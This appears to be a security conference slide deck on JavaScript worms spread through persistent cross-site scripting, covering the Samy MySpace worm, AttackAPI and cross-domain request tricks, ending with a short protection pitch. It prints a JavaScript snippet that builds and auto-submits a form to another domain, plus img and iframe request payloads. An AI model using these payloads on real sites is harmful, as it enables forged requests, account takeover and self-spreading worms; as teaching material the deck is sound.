Javascript worms
The next step in the evolution
By Benjamin Mossé
SecPro
www.secpro.com.au
Synopsis
• Introduction to cross site scripting
• Permanent XSS
• Javascript worms up to now
• A fresh technique: remote request
• Profit of APIs to build worms
• Protecting yourself
• Conclusion
www.secpro.com.au
Introduction to XSS
• The most common web vulnerability
• Allows client side script injection (html,
javascript, vbscript, etc.)
• The target executes the malicious code
• There isn't any “magic” solution against it
www.secpro.com.au
Introduction to XSS (cont.)
• Javascript is the language used to exploit
this vulnerability
• Before 2005, the XSS wasn't considered
critical
• Wrong idea: “you can only steal cookies
with it”
• 2005: Ajax, possibility to create http
requests
www.secpro.com.au
Introduction to XSS (cont.)
• 3 different types:
– Non permanent
– Permanent
– Dom-based
• A JavaScript exploit would work the same
with every of them
www.secpro.com.au
Permanent XSS
• Stays on the website permanently
• Known also as Persistent
• The JavaScript exploit is stored (e.g
Database, RSS)
• Affects every person visiting the infected
page
www.secpro.com.au
Permanent XSS (cont.)
Insert malicious
code in a form
Vulnerable site
Website saves
the script into
the database
Hacker
Infected site
Users getting exploited
Users
Database
www.secpro.com.au
“Samy is my Hero”
• Infected MySpace and took it down
• Most famous Javascript worm
• Spread through a permanent XSS
• Made users perform malicious commands
using Ajax
• Users would re-infect their account
www.secpro.com.au
Samy is my Hero (analyse)
MYSPACE.COM
Worm site
on MySpace
Users
The infected page makes the users infect other pages on the website:
THE WORM IS SPREADING EVERYWHERE
www.secpro.com.au
Javascript worms assets
• Very hard to detect
• Very stealth: runs in the background & don't
modify your web page
• It's not the pirate who performs the attack
but an exploited user
• Can spread very quickly
• Up to a certain point it's impossible to trace
back the pirate
www.secpro.com.au
Using Ajax
• Perform http requests on the infected website
• NO REMOTE REQUESTS, only works on the
same domain
• Hacking possibilities: make target do request he
didn't intend too (e.g. password modification,
delete account, change email, change secret
question, exploit SQL injection, exploit remote
code execution, spread the worm, deface
website ...)
www.secpro.com.au
A fresh technique: remote requests
• Is it really impossible to make remote http
requests with Javascript? -> NO!
GET request methodologies:
- Append an image in the page
(e.g. <img src=”http://www.target.com/page.php?var=value” />)
- Append a frame in the page
(e.g. <iframe src=”http://www.target.com/page.php?var=value” />)
POST request methodologies:
- Append a complete form on the page
- submit the form with Javascript
(e.g. page.form.submit();)
www.secpro.com.au
Processing POST requests
var objBody = document.getElementsByTagName("body")[0];
var form = document.createElement("form");
var form_action = document.createAttribute("action");
form_action.value = "http://www.targetonotherdomain.com/page.php";
form.setAttributeNode(form_action);
var input_username = document.createElement("input");
var attr_username_name = document.createAttribute("name");
input_username.setAttributeNode(attr_username_name);
form.appendChild(input_username);
objBody.appendChild(form);
document.getElementsByTagName("form")[0].submit();
www.secpro.com.au
GNUCITIZEN: AttackAPI
• Hackers' API to build Javascript worms
• Uses Google's APIs to search for targets
• Makes the manipulation of web pages with
Javascript easy as
• Other features: cookie stealing and
modifying, do CSRF attacks, ports
scanner, hijack forms and more!
• And much more to come in the next
version.
www.secpro.com.au
Future worms
1
2
worm
Users visit web page infected with a worm
worm
The worm looks for vulnerable targets on
Internet using the Google API
Internet
OTHER
WEBSITES
3
worm
The worms uses visitors to infect or attack
a list of websites he found
www.secpro.com.au
Risk? Consequences?
• Obviously very high!
• Imagine someone finding a permanent XSS on a
website like MySpace and using the users to lunch a
attack over others Internet websites?
• Imagine your company website getting target by
millions of MySpace's users?
• Imagine that when security experts look who hack a
website they don't found the pirate IP but yours?
• What will you do?
www.secpro.com.au
Protecting your applications
“Satisfaction remains a shape of resignation”
• Start by educating your programmers to
secure programming
• Ask for regular security checking of your web
applications to SecPro
www.secpro.com.au
Conclusion
• It's now possible to massively attack
Internet with a XSS vulnerability
• Never underestimate the cross site scripting
vulnerability again!
• Protect your web application against it, not
only for your personal security but for the
entire Internet community
www.secpro.com.au
Benjamin Mossé
• Security Specialist with SecPro (Melbourne,
Australia)
• Researcher & programmer
• benjamin.mosse@secpro.com.au
• SecPro specializes in penetration testing
and consulting of web applications security.
www.secpro.com.au